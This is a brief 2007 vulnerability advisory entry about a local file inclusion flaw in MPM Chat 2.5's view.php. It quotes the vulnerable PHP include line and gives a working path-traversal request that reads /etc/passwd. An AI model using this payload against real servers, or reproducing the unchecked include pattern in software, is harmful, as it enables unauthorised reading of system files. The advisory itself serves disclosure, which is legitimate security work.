MPM Chat 2.5 (view.php logi) Local File Include Exploit

2007-03-17T00:00:00
ID SECURITYVULNS:DOC:16392
Type securityvulns
Reporter Securityvulns
Modified 2007-03-17T00:00:00

Description

MPM Chat 2.5 (view.php logi) Local File Include Exploit

D.Script: http://mpm.pahviloota.net/mpm_chat_25.zip

Discovered by: GloD_M = [Mahmood_ali]

Homepage: http://www.Tryag.cc

Greetz To: Tryag-Team & 4lKaSrGoLd3n-Team & AsbMay's Group

V.Code

<?php if ($logi != '') { include 'archive/' . $logi;

Exploit: /[path]/view.php?logi=../../../../../etc/passwd